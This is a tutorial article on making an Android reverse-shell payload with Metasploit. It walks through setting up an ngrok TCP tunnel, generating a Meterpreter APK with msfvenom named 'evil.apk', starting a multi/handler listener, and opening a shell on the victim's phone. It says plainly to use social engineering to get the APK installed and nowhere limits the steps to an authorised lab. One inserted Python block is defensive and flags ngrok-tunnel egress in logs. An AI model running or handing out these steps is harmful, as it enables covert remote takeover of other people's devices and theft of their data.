
How to use a Reverse Shell in Metasploit in Kali Linux


Metasploit is not just a single tool; it is a complete framework. It is a Ruby-based, modular penetration testing platform that lets you write, test, and execute exploit code. It is flexible, extremely robust, and ships with a large collection of tools for simple and complex tasks alike. Metasploit Framework generates payloads in formats such as .apk and .exe; once such a payload runs on the target, it opens a connection back to the attacker's machine from the victim's system or phone. Metasploit Framework comes preinstalled on many Linux distributions (Kali Linux among them), and it can also be used on Windows.


We can download Metasploit Framework from the link below:

https://www.metasploit.com/download

In this article, we will gain reverse shell access to an Android phone using a Metasploit payload.

What is a Reverse Shell?

A reverse shell, or connect-back shell, is a way of taking over a victim's system through its vulnerabilities to obtain a shell session on that system. In most cases a reverse shell succeeds because the victim's own machine opens the connection. A firewall usually blocks inbound connections from outside, but most firewalls allow any outgoing connection. The attacker therefore relies on the victim's system to initiate the connection back to the attacker; that is what makes it a reverse shell.
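The connect-back behaviour described above is also what a defender looks for: an unexpected outbound connection from an internal host to a tunnel endpoint or an unusual port. The following is an added example, not part of the original article: it scans constructed outbound-connection log lines (the format is assumed, not a real product's) and flags destinations shaped like ngrok's TCP tunnel hostnames (the `<n>.tcp.<region>.ngrok.io` form this article uses as the callback address) or connections to ports outside an allow-list.

```python
import re
from collections import namedtuple

# Constructed sample of outbound-connection log lines (not real traffic).
# Assumed format: "<timestamp> <src_ip>:<src_port> -> <dst_host>:<dst_port> <proto>"
SAMPLE_LOG = """\
2022-11-07T10:00:01 10.0.0.12:51234 -> www.example.com:443 tcp
2022-11-07T10:00:05 10.0.0.12:51240 -> 0.tcp.in.ngrok.io:12345 tcp
2022-11-07T10:00:09 10.0.0.17:51250 -> updates.example.org:80 tcp
2022-11-07T10:00:12 10.0.0.12:51260 -> 4.tcp.eu.ngrok.io:18080 tcp
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[^:\s]+):(?P<dport>\d+)\s+(?P<proto>\w+)$"
)

# ngrok TCP tunnel endpoints look like "<n>.tcp.<region>.ngrok.io"
# (the region label is optional).
NGROK_TCP_RE = re.compile(r"^\d+\.tcp(\.[a-z]+)?\.ngrok\.io$", re.IGNORECASE)

Finding = namedtuple("Finding", "ts src dst dport reason")


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def suspicious_egress(log_text, allowed_ports=(80, 443)):
    """Return a Finding for every outbound connection that looks like a tunnel call-back."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines rather than crashing the scan
        reasons = []
        if NGROK_TCP_RE.match(rec["dst"]):
            reasons.append("ngrok tcp tunnel destination")
        if rec["dport"] not in allowed_ports:
            reasons.append("non-standard egress port")
        if reasons:
            findings.append(Finding(rec["ts"], rec["src"], rec["dst"],
                                    rec["dport"], "; ".join(reasons)))
    return findings
```

Running `suspicious_egress(SAMPLE_LOG)` reports the two ngrok connections and leaves the ordinary web traffic alone; in practice the allow-list and destination patterns would come from the organisation's egress policy.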

Creating an Android reverse shell payload using Metasploit Framework

On most Linux-based systems Metasploit is already installed. It can also be used on Windows, but the process differs: on Windows you get a GUI (graphical user interface), whereas on Linux you work from the CLI (command line interface).

Let’s install it on our Linux Systems:

Step 1: Installation of Metasploit 

Open a terminal and install it with:

sudo apt install metasploit-framework

Alternatively, clone the rapid7 repository from GitHub:

git clone https://github.com/rapid7/metasploit-framework

After successful installation, we can try to start the Metasploit console just by writing:

msfconsole


Note: If you run into installation issues, try cloning it from GitHub instead.

You will be dropped at a prompt reading msf6>. Exit it for now by typing:

exit

Now we have to build a reverse shell payload for an Android device; the most suitable format is a .apk file.

Step 2: Using the Ngrok Tunneling service

Ngrok is a tunneling service that exposes a port on our machine through a public endpoint, so a remote system can reach it over the WAN without any changes to our own network. It is a secure and reliable tunneling service.

Create an account and download the archive. After the download, open a terminal and run:

cd <path to ngrok>
unzip ngrok.zip

This unpacks the ngrok binary. Next we have to give it the auth token from your ngrok dashboard.

Note: On the page where you downloaded ngrok, your auth token is shown together with the command that registers it; copy it from there.

ngrok config add-authtoken <your token>

Nothing visible happens, but the token is now saved on your system. Start the ngrok service to verify that it works:

./ngrok tcp 8080


Here we use a TCP tunnel, so we have to give it the local port number to forward to.

Note: The port number is your choice; any 4-digit port number will do.

Step 3: Making the Payload

Leave ngrok running and open a new terminal. We have to create the reverse shell payload. In the new terminal type the command below:

msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.in.ngrok.io lport=<the port shown next to the hostname in the ngrok output> R> evil.apk

  • msfvenom: the Metasploit Framework command used to generate payloads
  • -p: selects the payload type
  • android/meterpreter/reverse_tcp: a built-in Metasploit payload for an Android reverse shell connection
  • lhost: the host the payload connects back to (here, the public ngrok hostname)
  • lport: the port the payload connects back to (here, the public port ngrok assigned)
  • R>: raw output (R) redirected (>) to the file name and location of your payload

Now all that remains is some social engineering to get the apk file onto the victim's device. Meanwhile we have to be ready to accept the connection, so let's prepare a session for it. Clear the terminal and start

msfconsole

This opens the Metasploit console, where we will accept the connection.

Now, in the console (LHOST and LPORT here are the local end of the ngrok tunnel, i.e. the port you passed to ngrok, not the public ngrok address):

msf6> use exploit/multi/handler
msf6> set payload android/meterpreter/reverse_tcp
msf6> set LHOST 127.0.0.1
msf6> set LPORT 8080
msf6> exploit -j

Once the victim has installed the apk and run it for the first time, a Meterpreter session (the reverse shell) opens in the handler.

Once you are in the Meterpreter session, type

help

This lists the commands available against the victim's system. Let's try to get a shell session; just type shell:

meterpreter> shell

A system shell on the Android device opens.


Last Updated : 07 Nov, 2022